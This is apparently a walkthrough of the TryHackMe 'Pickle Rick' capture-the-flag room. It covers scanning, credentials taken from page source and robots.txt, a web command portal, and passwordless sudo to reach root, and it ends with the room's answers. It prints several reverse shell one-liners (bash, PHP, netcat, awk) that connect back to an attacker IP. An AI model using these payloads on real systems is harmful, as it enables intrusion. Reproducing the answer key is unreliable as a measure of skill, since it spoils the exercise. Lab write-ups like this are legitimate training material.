THM Room: Pickle Rick CTF

Overview

Pickle Rick Logo

This Rick and Morty themed challenge requires you to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Deploy the virtual machine on this task and explore the web application: MACHINE_IP

You can also access the web app using the following link: https://lab_web_url.p.thmlabs.com/ (this will update when the machine has fully started)

Information Gathering

export ip=10.10.12.75

Scanning

Nmap Scan Result

$ nmap -sTV -O -sC $ip

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Operating System: Ubuntu

Nikto Scan

$ nikto -host http://$ip

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.12.75
+ Target Hostname:    10.10.12.75
+ Target Port:        80
+ Start Time:         2021-05-02 01:37:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7889 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-05-02 02:31:46 (GMT-4) (3267 seconds)
------------------------------------------------------------------

Enumeration

There are two open ports in the system, one has a ssh service running and the other have a http service running on it. The ssh service used for remote login and management of the server that required username and password pair or a private key for a successful login. We cannot have either of them right now so we move on to http service right now. HTTP is a protocol that is used by the webserver to serve a web page. From our scanning, we see they are using a Apache web server and which means they are hosting some web pages.

When browsing the website from this link http://10.10.12.75 we see a static page and when I see its source code by pressing CTRL + U the key in my Firefox browser I see there is a comment in its source code that is following.

Username: R1ckRul3s

Website often have a file name robots.txt that tells the search engine crawlers not to crawl the mentioned endpoints in this file. This website also has this file and they have the following thing in it.

Wubbalubbadubdub

The robots.txt file syntax are not like this, they are like following

User-agent: *
Disallow: /

But this webserver file is not like that so that means it's something else, we just keep that in our notes right now.

We didn't find any reference to any other pages on the site so to increase our attack scope we are doing Directory Fuzzing or Content discovery to find some hidden directories and files. The hidden directories and files are those directories and files that exist in the web server's root directory the website doesn't show any reference to them on its page. To find that directories and files we do fuzzing in which we have a wordlist of common directories and file names and we send lots of requests to the server that has the directories and files name. We do that using tools like ffuf, gobuster, and Burp suite, etc. We also refer to isit as Content Discovery.

Directory Fuzzing

$ ffuf -w /usr/share/wordlist/dirbuster/directory-list-2.3-small.txt:FUZZ -u http://$ip/FUZZ -e .php,.txt

/assets
robots.txt 
login.php

Using the ffuf a tool with the above command I found that files in which we found /assets the directory that has some common files like css and js file, robots.txt, and a login.php that we also see in nikto scan result let's visit it.

We see they have a login page in which they required a username and password. We have found one username but we didn't have any password we can try to bruteforce it but before that let's try the string we found in robots.txt.

It works and they give us the successful login and redirected us to /portal.php. They give us some command execution portal in which we can execute system commands. We love to see this!

We can use simple commands ls to list all the current working directory files we see a file name Sup3rS3cretPickl3Ingred.txt. Use cat to view the content of that file. When we submit that they didn't give us any output look like they add some blacklist for the command. There are some other commands that are used to see the content of a file i.e more, head, tail, less etc let's use that and which one will work fine. One of them worked and we successfully get the content of that file to submit it to tryhackme.

Getting reverse shell

Note: We didn't need a reverse shell to solve this room. Just the sake of methodology I use this method to solve that room.

We have a command execution now let's try to get a reverse shell. Start a listener on your attacking machine with netcat or a pawncat whatever method you like I use the netcat listener with the following command.

nc -lvnp 4444

Unfortunately, after trying some basic bash reverse shell payload I can't get the reverse shell.

1) bash -i >& /dev/tcp/10.8.186.33/5555 0>&1

2) php -r '$sock=fsockopen("10.8.186.33",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

3) nc -e /bin/sh 10.8.186.33 5555

4) rm -f /tmp/p; mknod /tmp/p p && nc 10.8.186.33 5555 0/tmp/p

After trying another reverse shell payload I eventually got a connection back. The following reverse shell payload worked for me.

awk 'BEGIN {s = "/inet/tcp/0/10.8.186.33/9001"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

This gives me a reverse shell but this is only a replica of the web shell in your terminal this is not a normal shell but there you can use all commands that are blacklisted like cat, more, head.

Now we can try to find other ingredient, first, check in the home directory and there is a user home directory /home/rick that has the second ingredients file.

Note: That file another ingredienthave spaces in there name so use the quotes in the command for see that file content like the following command

cat /home/rick/"second ingredients"

Now use the following command to get all the binaries with suid permission set so we can use that to get a elevated permission.

find / -perm /4000 2>/dev/null

They show me the following result

/snap/core/5742/bin/mount
/snap/core/5742/bin/ping
/snap/core/5742/bin/ping6
/snap/core/5742/bin/su
/snap/core/5742/bin/umount
/snap/core/5742/usr/bin/chfn
/snap/core/5742/usr/bin/chsh
/snap/core/5742/usr/bin/gpasswd
/snap/core/5742/usr/bin/newgrp
/snap/core/5742/usr/bin/passwd
/snap/core/5742/usr/bin/sudo
/snap/core/5742/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/5742/usr/lib/openssh/ssh-keysign
/snap/core/5742/usr/lib/snapd/snap-confine
/snap/core/5742/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/ntfs-3g
/bin/ping
/bin/su
/bin/ping6
/bin/mount
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

There we didn't see any useful method to get easy privilege escalation. The next thing we can try is to use sudo -l command and see if we can use any command with sudo there we see we can run all commands as sudo with NO PASSWORD. Knowing that we can use the following command to list all the content of /root directory.

sudo ls -al /root

After using the above command we came to know there is a file with the name 3rd.txt so just use the following command and see the content of the 3rd ingredient

sudo cat /root/3rd.txt

Here we find all the ingredient

Q: What is the first ingredient Rick needs?

A: mr. meeseek hair

Q: What's the second ingredient Rick needs?

A: 1 jerry tear

Q: What's the final ingredient Rick needs?

A: fleeb juice